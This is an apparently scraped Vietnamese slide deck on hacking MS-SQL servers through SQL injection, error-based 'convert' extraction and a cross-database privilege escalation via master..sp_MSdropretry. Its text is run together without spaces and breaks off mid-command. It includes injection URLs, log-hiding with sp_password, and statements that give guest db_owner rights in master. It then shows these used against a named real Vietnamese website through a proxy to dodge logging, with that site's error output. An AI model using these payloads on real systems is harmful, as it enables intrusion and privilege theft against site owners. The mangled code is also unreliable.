Thâm nhập máy chủ Ms-Sql qua lỗi Sql-Injection, Cross-Database

PHÁT HIỆN LỖI SQLINJECTIONhttp://www.company.com/product/price.asp?id=1select price from product where id=1http://www.company.com/product/price.asp?id=1’select price from product where id=1’Unclosed quotation mark before the character string ‘http://www.company.com/product/price.asp?id=[...]
Nội dung trích xuất từ tài liệu:
Thâm nhập máy chủ Ms-Sql qua lỗi Sql-Injection, Cross-Database XâmnhậpmáychủMsSqlqualỗiSqlInjection&CrossDatabasetrangnàyđãđượcđọc lầnPHẦNI:CÁCKĨTHUẬTHACKTRONGSQL•sqlinjection•convertmagic•crossdatabasePHÁTHIỆNLỖISQLINJECTIONhttp://www.company.com/product/price.asp?id=1selectpricefromproductwhereid=1http://www.company.com/product/price.asp?id=1’selectpricefromproductwhereid=1’Unclosedquotationmarkbeforethecharacterstring‘http://www.company.com/product/price.asp?id=[...]KĨTHUẬTCONVERTMAGIChttp://wwww.company.com/product/price.asp?id=1and1=convert(int,@@version)sp_passwordselectpricefromproductwhereid=1and1=convert(int,@@version)sp_passwordSyntaxerrorconvertingthenvarcharvalueMicrosoftSQLServer7.007.00.623(IntelX86)Nov23199821:08:09Copyright(c)19881998MicrosoftCorporationStandardEditiononWindowsNT5.0(Build2195:ServicePack3)toacolumnofdatatypeint.sp_passwordwasfoundinthetextofthisevent.Thetexthasbeenreplacedwiththiscommentforsecurityreasons.•@@servername,db_name(),system_user,...•‘“()LỖICROSSDATABASECỦAMSSQLusetestdatabasecreateprocdbo.testasselect*frommaster.dbo.sysxloginsgoexectestselect*frommaster.dbo.sysxlogins•sa==dbo•db_ownercóthểcreate&designcácobjectcủadbo•SIDcủaprocdbo.test==SIDcủamaster.dbo.sysxloginsLỖIINJECTIONCỦAMASTER..SP_MSDROPRETRYCREATEPROCEDUREsp_MSdropretry(@tnamesysname,@pnamesysname)asdeclare@retcodeint/***Topublic*/exec(droptable+@tname)if@@ERROR0return(1)exec(dropprocedure+@pname)if@@ERROR0return(1)return(0)NÂNGQUYỀNQUAMASTER..SP_MSDROPRETRYexecsp_executesqlNcreateviewdbo.testasselect*frommaster.dbo.sysusersexecsp_msdropretryxxupdatesysuserssetsid=0x01wherename=dbo,xxexecsp_msdropretryxxupdatedbo.testsetsid=0x01,roles=0x01wherename=guest,xxexecsp_executesqlNdropviewdbo.test‘droptablexxupdatesysuserssetsid=0x01wherename=dbodropprocedurexxdroptablexxupdatedbo.testsetsid=0x01,roles=0x01wherename=guestdroptablexx•guest==db_ownercủadatabasemasterPHẦN2:MINHHỌAHACKSQL•Khaitháclỗisqlinjectiontạinhaxinh.com.vn•MộtsốkinhnghiệmkhihackSQLLỖISQLINJECTIONTẠINHAXINH.COM.VN•dùng“proxy.ia2.marketscore.com:80”ðểtránhbịghinhậtkíhttp://www.nhaxinh.com.vn/FullStory.asp?id=1http://www.nhaxinh.com.vn/FullStory.asp?id=1’MicrosoftOLEDBProviderforODBCDriverserror80040e14[Microsoft][ODBCSQLServerDriver][SQLServer]Unclosedquotationmarkbeforethecharacterstring./Including/general.asp,line840XÁCĐỊNHVERSIONhttp://www.nhaxinh.com.vn/FullStory.asp?id=1and1=convert(int,@@version)MicrosoftOLEDBProviderforODBCDriverserror80040e07[Microsoft][ODBCSQLServerDriver][SQLServer][SQLServer]SyntaxerrorconvertingthenvarcharvalueMicrosoftSQLServer7.007.00.1063(IntelX86)Apr9200214:18:16Copyright(c)19882002MicrosoftCorporationEnterpriseEditiononWindowsNT5.0(Build2195:ServicePack4)toacolumnofdatatypeint./Including/general.asp,line840XÁCĐỊNHSERVER_NAMEhttp://www.nhaxinh.com.vn/FullStory.asp?id=1and1=convert(int,@@servername)MicrosoftOLEDBProviderforODBCDriverserror80040e07[Microsoft][ODBCSQLServerDriver][SQLServer]SyntaxerrorconvertingthenvarcharvalueUNESCOtoacolumnofdatatypeint./Including/general.asp,line840http://www.nhaxinh.com.vn/FullStory.asp?id=1and1=convert(int,db_name())MicrosoftOLEDBProviderforODBCDriverserror80040e07[Microsoft][ODBCSQLServerDriver][SQLServer]SyntaxerrorconvertingthenvarcharvalueNhaXinhtoacolumnofdatatypeint./Including/general.asp,line840http://www.nhaxinh.com.vn/FullStory.asp?id=1and1=convert(int,system_user)MicrosoftOLEDBProviderforODBCDriverserror80040e07[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvaluenhaxinhtoacolumnofdatatypeint./Including/general.asp,line840•user_name():cácmembercủa“sysadmin”đượcmapsang“dbo”XÁCĐỊNHMỨCQUYỀNCỦASQLSERVERhttp://www.nhaxinh.com.vn/FullStory.asp?id=1;select*fromopenrowset(sqloledb,;;,)MicrosoftOLEDBProviderforODBCDriverserror80040e14[Microsoft][ODBCSQLServerDriver][SQLServer]AdhocaccesstoOLEDBprovidersqloledbhasbeendenied.Youmustaccessthisproviderthroughalinkedserver./Including/general.asp,line840•adminđãdisableopenrowset/sqloledb,sẽenablelạisauĐƯAGUESTVÀODB_OWNERCỦADATABASEMASTER1http://www.nhaxinh.com.vn/FullStory.asp?id=1;execsp_executesqlNcreat ...